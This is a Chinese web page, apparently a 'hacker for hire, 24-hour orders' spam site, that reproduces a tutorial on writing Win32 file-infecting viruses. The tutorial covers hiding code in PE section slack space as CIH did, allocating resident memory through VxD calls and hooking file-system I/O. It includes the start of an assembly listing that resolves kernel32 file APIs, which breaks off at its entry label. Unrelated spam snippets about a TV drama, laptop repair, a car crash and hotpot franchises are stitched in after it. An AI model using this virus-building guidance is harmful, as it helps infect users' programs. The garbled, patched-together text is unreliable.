专业黑客24小时接单介绍2020 *** 黑客24小时接单

访客3年前关于黑客接单712

本文假定你对dos下的病毒和386PM有一定的了解。  

1、感染任何一个病毒都需要有寄主,把病毒代码加入寄主程序中 
(伴侣病毒除外)。  
以下说明如何将病毒代码嵌入PE文件中,有关PE文件的结构请看以前的文章。 PE文件的典型结构: MZ Header DOS STUB CODE PE HEADER OPTIONAL HEADER SECTION TABLE SECTION 1 SECTION 2 ... IMPORT TABLE EXPORT TABLE 和DOS的可执行文件类似,PE的代码映象分为几个SECTION,在文件中会对齐  
页边界(4K)。一般来说,文件会加载在400000h开始的空间,而之一个SECTION在401000h处,同时入口地址也是401000h。由高级语言编写的程序,每个SECTIO-N的长度不可能刚好是4K的倍数,因此在SECTION的末尾将会存在一段未用的空间 , 大小可由Section的PHYSICAL SIZE-VIRTUALSIZE得到,在文件中起始位置可由 PHYSICAL OFFSET得到,这段空间可以用来存放病毒代码。此外一般来说, MZ Header+DOS STUD+PE  
HEADER+OPTIONAL HEADER+SECTION TABLE不过1K左右, 而SECTION 1由4K开始,空出来的地方足够存放一个设计精良的病毒。CIH就是将 代码存放在这些空闲空间里。  

2、分配驻留所需内存  
对于驻留形的病毒,分配驻留所需内存是必需的。在DOS下使用由于所有的 应用程序都映射在相同的线性地址空间里,使用一般的内存分配调用就足够了。而在WIN32下,每个应用程序都有自己的线性地址空间,必须使用特殊的函数分配2GB以上的系统地址。典型的如:VXD服务_PageAllocate,和kernel32的 VxDCALL  
_PageReserve。_PageAllocate请参看win98ddk中的说明,VxDCall _PageReserve 请参看HPS源码中的注释。  

3、截留FILE I/O操作 驻留型的病毒通过截留FILE I/O来激活,可以通过使用VXD服务  
IF *** gr_Install-FileSystemAPIHook(如CIH)或截留VxDCall中的DOS Services callback(如HPS)。  
在Win32下编写病毒不是一件困难的事。值得注意的有几件事:  

一、Win32下的系统功能调用不是通过中断实现,而是由DLL中导出。  
(直接使用VxD服务除外)。直接在病毒中得到API入口不是一件容易的事,可以通过以下这个变通的 *** 。  
在同一个版本的Windows下,同一个核心函数的入口总是固定的 
(指由Kernel32,gdi32,user32导出的函数)。因此可以用以下的 *** 得到函数入口:  
.386p  
.model flat,stdcall  
extrn GetModuleHandleA:proc  
extrn GetProcAddress:proc  
extrn ExitProcess:proc  
.data  
szKernel db 'KERNEL32.DLL',0  
szFindFirst db 'FindFirstFileA',0  
szFindNext db 'FindNextFileA',0  
szFindClose db 'FindClose',0  
szGetCurrentDir db 'GetCurrentDirectoryA',0  
szGetWinDir db 'GetWindowsDirectoryA',0  
szGetSysDir db 'GetSystemDirectoryA',0  
szGetFileAttrib db 'GetFileAttributesA',0  
szSetFileAttrib db 'SetFileAttributesA',0  
szlopen db '_lopen',0  
szlread db '_lread',0  
szlwrite db '_lwrite',0  
szlclose db '_lclose',0  
szllseek db '_llseek',0  
hKernel dd 0  
.code  
;Initialize code  
start:  

相关文章

《在劫难逃》孙晓萌是反派吗 孙晓萌是隐藏boss吗

《在劫难逃》孙晓萌是反派吗 孙晓萌是隐藏boss吗

《在劫难逃》中孙晓萌这一人物角色是较为令人无法揣摩的,也十分神密,她和赵彬彬中间存有一定的联络,那麼,《在劫难逃》孙晓萌是反派角色吗?下边我就而言说。 《在劫难逃》孙晓萌是反派角色吗 《在劫难逃》...

笔记本电脑显示屏坏了能修吗

笔记本电脑显示屏坏了能修吗、寻找买笔记本电脑的店家在质保期内开展完全免费检修拆换,但是拆换电脑上曲屏价钱较为价格昂贵,很有可能必须自身买电脑显示屏。    2、自身买显示屏找电脑上店家开展电脑显示屏检...

美国得克萨斯州发生高龙福简历大规模连环车祸 造成至少

  中新社休斯敦2月11日电 当地时间11日,因冷空气南下导致路面湿滑,美国得克萨斯州达拉斯-沃思堡地区附近一高速公路发生大规模连环车祸,造成至少5人死亡,30余人受伤。   美国有线电视新闻网消息...

有什么火锅加盟连锁推荐吗?这三个项目带你走向成功!

都说没什么并不是一顿火锅店难以解决的,如今火锅店变成一种特色美食,是大家喜欢吃的,也是每天晚上受欢迎的特色美食之一。这也促使我们在火锅店这一领域看到了期待,看到了创业商机。因此 项目投资火锅店加盟连锁...

为黑客服务的网站「24小时在线黑客联系方式免费」

  十大黑客网站   目前来说,大家现在百度搜索“黑客网站”会发现有很多大大小小的黑客网站。但到底哪些是知名度最高、建站时间最长的黑客网站呢?下面康少已经给大家列举出来了10个黑客经常逛的网站和论坛。...

民谣吉他什么牌子好(初学者应该用什么牌子的

民谣吉他什么牌子好(初学者应该用什么牌子的

吉他哪个品牌好、初学者应该怎样选吉他?读完本文你应该就明白了、读完后肯定不至于在琴行被忽悠、购琴通常有两种渠道、去琴行和网购、本文主要介绍网购如何选琴、相对于实体店来讲、网购价格透明、配件齐全、品牌琴...